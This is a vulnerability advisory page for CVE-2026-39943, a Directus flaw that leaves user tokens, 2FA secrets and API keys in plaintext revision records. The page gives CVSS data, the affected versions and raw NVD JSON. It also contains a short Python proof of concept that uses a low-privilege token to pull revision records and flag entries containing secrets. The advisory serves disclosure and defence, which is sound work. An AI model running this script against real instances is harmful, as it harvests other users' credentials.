Security Vulnerability Report
CVE-2026-39943 CVSS 6.5 MEDIUM

CVE-2026-39943

Published: 2026-04-09 17:16:30
Last Modified: 2026-04-14 17:34:15

Description

Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus stores revision records (in directus_revisions) whenever items are created or updated. Due to the revision snapshot code not consistently calling the prepareDelta sanitization pipeline, sensitive fields (including user tokens, two-factor authentication secrets, external auth identifiers, auth data, stored credentials, and AI provider API keys) could be stored in plaintext within revision records. This vulnerability is fixed in 11.17.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:* - VULNERABLE
Directus < 11.17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL for the Directus revisions collection
target_url = "https://target-directus-instance.com/items/directus_revisions"

# Authorization token (low-privileged user token)
headers = {"Authorization": "Bearer LOW_PRIVILEGE_TOKEN"}

# Send GET request to fetch revision records
response = requests.get(target_url, headers=headers)

if response.status_code == 200:
    data = response.json()
    # Check for sensitive fields in the response data
    for item in data["data"]:
        print(f"Revision ID: {item['id']}")
        # Sensitive data might be nested in the 'data' field of the revision
        if "data" in item and ("token" in str(item["data"]) or "secret" in str(item["data"])):
            print(f"[!] Potential sensitive data found: {item['data']}")
else:
    print("Failed to retrieve data")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39943", "sourceIdentifier": "[email protected]", "published": "2026-04-09T17:16:29.960", "lastModified": "2026-04-14T17:34:15.280", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus stores revision records (in directus_revisions) whenever items are created or updated. Due to the revision snapshot code not consistently calling the prepareDelta sanitization pipeline, sensitive fields (including user tokens, two-factor authentication secrets, external auth identifiers, auth data, stored credentials, and AI provider API keys) could be stored in plaintext within revision records. This vulnerability is fixed in 11.17.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-312"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.17.0", "matchCriteriaId": "F2EBB337-0000-4792-940F-DAEFCFC17747"}]}]}], "references": [{"url": "https://github.com/directus/directus/releases/tag/v11.17.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/directus/directus/security/advisories/GHSA-mvv8-v4jj-g47j", "source": "[email protected]", "tags": 
["Vendor Advisory"]}]}}